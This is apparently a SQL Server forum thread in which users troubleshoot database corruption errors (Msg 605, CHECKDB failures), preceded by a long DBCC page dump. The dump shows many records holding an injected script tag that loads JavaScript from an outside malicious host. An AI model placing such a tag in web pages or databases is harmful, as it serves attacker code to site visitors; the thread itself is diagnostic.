6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 46, Offset 0x105e, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FD05E00000000: 08005400 0000979b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01002d00 68448463 45091702 98458463 †..-.hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 47, Offset 0x10b2, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FD0B200000000: 08005e00 0000989b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31313a31 333a3030 3c736372 †7 11:13:00<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 48, Offset 0x1110, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FD11000000000: 08005400 0000989b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01002f00 68448463 45091702 98458463 †../.hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 49, Offset 0x1164, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FD16400000000: 08005e00 0000999b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31313a31 393a3138 3c736372 †7 11:19:18<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 50, Offset 0x11c2, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FD1C200000000: 08005400 0000999b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01003100 68448463 45091702 98458463 †..1.hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 51, Offset 0x1216, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FD21600000000: 08005e00 00009a9b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31313a31 393a3433 3c736372 †7 11:19:43<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 52, Offset 0x1274, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FD27400000000: 08005400 00009a9b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01003300 68448463 45091702 98458463 †..3.hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 53, Offset 0x12c8, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FD2C800000000: 08005e00 00009b9b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31313a31 393a3532 3c736372 †7 11:19:52<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 54, Offset 0x1326, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FD32600000000: 08005400 00009b9b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01003500 68448463 45091702 98458463 †..5.hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 55, Offset 0x137a, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FD37A00000000: 08005e00 00009c9b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31313a31 383a3437 3c736372 †7 11:18:47<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 56, Offset 0x13d8, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FD3D800000000: 08005400 00009c9b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01003700 68448463 45091702 98458463 †..7.hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 57, Offset 0x142c, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FD42C00000000: 08005e00 00009d9b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31313a32 323a3335 3c736372 †7 11:22:35<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 58, Offset 0x148a, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FD48A00000000: 08005400 00009d9b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01003900 68448463 45091702 98458463 †..9.hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 59, Offset 0x14de, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FD4DE00000000: 08005e00 00009e9b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31313a32 323a3531 3c736372 †7 11:22:51<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 60, Offset 0x153c, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FD53C00000000: 08005400 00009e9b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01003b00 68448463 45091702 98458463 †..;.hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 61, Offset 0x1590, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FD59000000000: 08005e00 00009f9b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31313a32 333a3437 3c736372 †7 11:23:47<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 62, Offset 0x15ee, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FD5EE00000000: 08005400 00009f9b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01003d00 68448463 45091702 98458463 †..=.hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 63, Offset 0x1642, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FD64200000000: 08005e00 0000a09b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31313a32 343a3338 3c736372 †7 11:24:38<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 64, Offset 0x16a0, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FD6A000000000: 08005400 0000a09b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01003f00 68448463 45091702 98458463 †..?.hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 65, Offset 0x16f4, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FD6F400000000: 08005e00 0000a19b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31313a30 393a3537 3c736372 †7 11:09:57<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 66, Offset 0x1752, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FD75200000000: 08005400 0000a19b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01004100 68448463 45091702 98458463 †..A.hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 67, Offset 0x17a6, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FD7A600000000: 08005e00 0000a29b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31313a33 303a3434 3c736372 †7 11:30:44<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 68, Offset 0x1804, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FD80400000000: 08005400 0000a29b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01004300 68448463 45091702 98458463 †..C.hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 69, Offset 0x1858, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FD85800000000: 08005e00 0000a39b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31313a33 313a3036 3c736372 †7 11:31:06<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 70, Offset 0x18b6, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FD8B600000000: 08005400 0000a39b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01004500 68448463 45091702 98458463 †..E.hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 71, Offset 0x190a, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FD90A00000000: 08005e00 0000a49b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31313a33 313a3437 3c736372 †7 11:31:47<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 72, Offset 0x1968, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FD96800000000: 08005400 0000a49b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01004700 68448463 45091702 98458463 †..G.hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 73, Offset 0x19bc, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FD9BC00000000: 08005e00 0000a59b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31313a33 313a3530 3c736372 †7 11:31:50<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 74, Offset 0x1a1a, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FDA1A00000000: 08005400 0000a59b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01004900 68448463 45091702 98458463 †..I.hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 75, Offset 0x1a6e, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FDA6E00000000: 08005e00 0000a69b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31313a33 303a3534 3c736372 †7 11:30:54<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 76, Offset 0x1acc, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FDACC00000000: 08005400 0000a69b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01004b00 68448463 45091702 98458463 †..K.hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 77, Offset 0x1b20, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FDB2000000000: 08005e00 0000a79b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31313a30 313a3030 3c736372 †7 11:01:00<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 78, Offset 0x1b7e, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FDB7E00000000: 08005400 0000a79b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01004d00 68448463 45091702 98458463 †..M.hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 79, Offset 0x1bd2, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FDBD200000000: 08005e00 0000a89b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31303a34 393a3332 3c736372 †7 10:49:32<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 80, Offset 0x1c30, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FDC3000000000: 08005400 0000a89b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01004f00 68448463 45091702 98458463 †..O.hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 81, Offset 0x1c84, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FDC8400000000: 08005e00 0000a99b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31313a32 353a3238 3c736372 †7 11:25:28<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 82, Offset 0x1ce2, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FDCE200000000: 08005400 0000a99b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01005100 68448463 45091702 98458463 †..Q.hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 83, Offset 0x1d44, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FDD4400000000: 08005e00 0000aa9b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31313a33 393a3031 3c736372 †7 11:39:01<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 84, Offset 0x1da2, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FDDA200000000: 08005400 0000aa9b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01005300 68448463 45091702 98458463 †..S.hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... |
|
|
GilaMonster
Master Smack Fu Yak Hacker
4507 Posts |
Posted - 2008-05-19 : 12:21:09
|
DAC = Dedicated Administrative Connection.Details in Books Online.Did you try restoring the backup to a different server?If your backups are bad, you are probably going to lose data (Paul will be able to say for sure). The problem is that one of the tables involved is a system table, which (afaik) checkDB can not repair.Try restoring the DB on another server and running a check on it. If it's still bad, try dropping the g2_item table (on your test server). Run a checkDB again and see if that's resolved anything.--Gail Shaw |
|
|
robplatt
Starting Member
5 Posts |
Posted - 2008-05-19 : 12:28:55
|
I only have this server, and a failover server. the failover server only works if the primary goes down (the drives switch to the other server then of course). set up as a cluster.I'll look DAC up, thank you. I'm prepared to accept the loss of data, I'm just using this as a learning experience and trying to understand it all.I can not drop the table, it gives the same error. From research, my only option is to transfer my good tables to a new database and remove the old database, which I'm in the process of doing. I kept a copy online though to experiment with.thank you.... |
|
|
robplatt
Starting Member
5 Posts |
Posted - 2008-05-19 : 13:13:10
|
alright. i understand what DAC is, and am able to connect using it. how can i check the sysobjvalues table via the DAC query window? |
|
|
rmiao
Master Smack Fu Yak Hacker
7266 Posts |
Posted - 2008-05-19 : 23:35:24
|
select * from db_name.schema.table_name |
|
|
GilaMonster
Master Smack Fu Yak Hacker
4507 Posts |
Posted - 2008-05-20 : 02:46:07
|
quote: Originally posted by robplatt alright. i understand what DAC is, and am able to connect using it. how can i check the sysobjvalues table via the DAC query window?
DBCC CheckTable. It should work, though I have never tried it.you should be able to query the table also, see if it gives an error.Have you go no other servers, workstations, laptops where you can restore the DB for test purposes?--Gail Shaw |
|
|
Ken H
Starting Member
4 Posts |
Posted - 2008-05-27 : 20:51:42
|
I'm having what seems to be the exact same problem.We're upgrading our SAP R\3 system to a new 64 bit, clustered system, as well as upgrading from SQL 2000 to SQL 2005.After copying the 9 datafiles (each being almost 120 GB), I was able to bring up the SAP application. But during the upgrade from SQL 2000 to SQL 2005, while trying to delete the "Stored Procedures" use <SID>gosetuser '<sid>'go exec sap_droprocgoI received the "Warning: Fatal error 605 occurred ...." errorThen trying the CHECKDB, it returned the same error as robplatt received:Msg 605, Level 12, State 3, Line 1Attempt to fetch logical page (6:72) in database 6 failed. It belongs to allocation unit 71905451171905536 not to 281474979397632.Msg 8921, Level 16, State 1, Line 1Check terminated. A failure was detected while collecting facts. Possibly tempdb out of space or a system table is inconsistent. Check previous errors.(I increased the tempdb to 600 MB from 300 and reran, but with the same results)Checking the SQL Error logs didn't bring any new information on the subject.I'm not sure what tables would be involved with dropping the stored procedures, but is there anyway (short of doing another restore from Production) that I can make my through this error? |
|
|
GilaMonster
Master Smack Fu Yak Hacker
4507 Posts |
Posted - 2008-05-28 : 03:10:30
|
If I may suggest, run a checkDB on your production system. Often (but not always) if a backup has a corruption, the original database also has a corruption.--Gail Shaw |
|
|
Ken H
Starting Member
4 Posts |
Posted - 2008-05-28 : 15:47:32
|
Thanks GailCheckDB from the source system which was successfully completed without error.I've increased the tempdb and templog, but both dropping the Stored Procedure and the checkdb are still failing. |
|
|
GilaMonster
Master Smack Fu Yak Hacker
4507 Posts |
Posted - 2008-05-29 : 03:19:35
|
Does a checkdb of the db before you try doing the upgrade give you any errors?--Gail Shaw |
|
|
Ken H
Starting Member
4 Posts |
Posted - 2008-05-29 : 15:50:17
|
CHECKDB, returns the following error:Msg 605, Level 12, State 3, Line 1Attempt to fetch logical page (6:72) in database 6 failed. It belongs to allocation unit 71905451171905536 not to 281474979397632.Msg 8921, Level 16, State 1, Line 1Check terminated. A failure was detected while collecting facts. Possibly tempdb out of space or a system table is inconsistent. Check previous errors.Even the REPAIR_FAST & REPAIR_ALLOW_DATA_LOST options end with the same error.We're about ready to try restoring the datafiles again. Any Last Ditch ideas before we give that a try. |
|
|
GilaMonster
Master Smack Fu Yak Hacker
4507 Posts |
Posted - 2008-05-30 : 02:43:36
|
Try taking another backup of the prod DB and restoring and checking that. If you still get an error, try on a different server.CheckDB can't repait errors in the system tables, which is what you appear to have.--Gail Shaw |
|
|
Ken H
Starting Member
4 Posts |
Posted - 2008-05-30 : 15:13:18
|
Thanks GailWe had a SQL DBA take a look at our situation. He's identified that the problem may be due to having SQL installed on one of the Mount Points instead of the root of the drive.Further analysis continues and I will update everyone when something is more conclusive.Thanks for your help everyone.Ken |
|
|
tkizer
Almighty SQL Goddess
38200 Posts |
|
acidpaul
Starting Member
1 Post |
Posted - 2011-03-08 : 00:07:01
|
Good day!I'm having a SQL Error when I access the table. I already used DBCC CHECKTABLE (tablename, REPAIR_ALLOW_DATA_LOSS) but this error will always pop out.Error Message:Attempt to fetch logical page (1:143288) in database 27 failed. It belongs to allocation unit 0 not to 281474980642816.Any suggestion would be very much appreciated. |
|
|
tkizer
Almighty SQL Goddess
38200 Posts |
|
|
|
|
|
|